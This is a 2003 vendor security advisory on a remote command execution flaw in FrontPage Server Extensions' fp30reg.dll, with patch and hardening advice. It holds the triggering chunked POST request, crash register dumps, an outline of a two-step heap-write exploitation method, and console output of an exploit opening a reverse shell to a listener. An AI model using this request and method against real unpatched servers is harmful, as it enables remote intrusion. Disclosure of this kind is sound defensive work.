======================================================================== = Frontpage Extensions Remote Command Execution = = MS Bulletin posted: = http ://www.microsoft.com/technet/security/bulletin/ms03-051.asp = = Affected Software: = Microsoft Windows 2000 Service Pack 2, Service Pack 3 = Microsoft Windows XP, Microsoft Windows XP Service Pack 1 = Microsoft Office XP, Microsoft Office XP Service Release 1 = = Public disclosure on November 11, 2003 ======================================================================== Continuing 'The Methodical Approach To Finding Overflows' we moved to the next attack avenue. After the success against nsiislog.dll we were again greeted by an access violation message leading to the discovery of another remote vulnerability. == Description == Sending a chunked encoded post to fp30reg.dll will cause an access violation resulting in the following error log. ------------------------------------------------------------------------ Event Type: Warning Event Source: W3SVC Event Category: None Event ID: 37 Description: Out of process application '/LM/W3SVC/1/ROOT' terminated unexpectedly. ------------------------------------------------------------------------ A chunked encoded post will result in the control of ECX and EDI, with the exception occurring at a mov dword ptr [ECX+4],EDI instruction leading to remote command execution with privileges associated with the IWAM_machinename account. == Chunked Transfer-Encoding Post == POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1 Transfer-Encoding: chunked PostLength PostData 0 == Exploitation == [Code Segment] 67D46AD3 mov ecx,dword ptr [ebx+edx+8] 67D46AD7 mov edi,dword ptr [ebx+edx+4] 67D46ADB mov dword ptr [ecx+4],edi [Registers] EAX = 046F83E8 EBX = 00000010 ECX = 58585858 EDX = 05450FEC ESI = 0000000C EDI = 58585858 EIP = 67D46ADB ESP = 0120F648 EBP = 0120F668 [EDX DUMP] 05450FEC 11 00 00 00 58 58 58 ....XXX 05450FF3 58 58 58 58 58 58 58 XXXXXXX 05450FFA 58 58 58 58 58 58 58 XXXXXXX 05451001 58 58 58 58 58 58 58 XXXXXXX 05451008 58 58 58 58 58 58 58 XXXXXXX 0545100F 58 58 58 58 58 58 58 XXXXXXX 05451016 58 58 58 58 58 58 58 XXXXXXX Many different ways to exploit this malloc/free scenario, so instead of the usual SEH redirect to a JMP instruction, we took a two step approach for higher reliability. At the first exception error we are in control of ECX and EDI allowing us to write our JMP instruction to a known writeable space. This does not cause an exception and execution flow continues through to a CALL instruction that uses a value from our buffer. We use this CALL to reach our JMP instruction. == Exploit Example == %:\>exploit 192.168.1.63 ** FP30REG.DLL - Ver 4.0.2.5526 - Remote Shell ** . Calling Home: blackhole:2000 . Using: 0x---------h as writeable data space . Shellcode Size: 304 bytes . Preparing Exploit Buffer......Ready . Starting Listener On Port: 2000 . Connecting To 192.168.1.63 . Sending Exploit......Exploit Sent . Connection Received Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>whoami IWAM_BLACKHOLE C:\WINNT\system32> == Solutions == - Every day is a 0-day day on the Internet. Limiting the avenues of attack can be a key factor in reducing the risk to a web server. Programs such as secureIIS and URLscan should be setup to reduce the number of methods that can be used to send data to a server. Removing unnecessary services, files and isapi extensions reduces the number of listeners that data can be fed to limiting the number of vulnerabilities that a server is susceptible to. - Install the vendor supplied patch. == Credit == Discovered and advised to Microsoft January 30, 2003 by Brett Moore of Security-Assessment.com == About Security-Assessment.com == Security-Assessment.com is a leader in intrusion testing and security code review, and leads the world with SA-ISO, online ISO17799 compliance management solution. Security-Assessment.com is committed to security research and development, and its team have previously identified a number of vulnerabilities in public and private software vendors products.
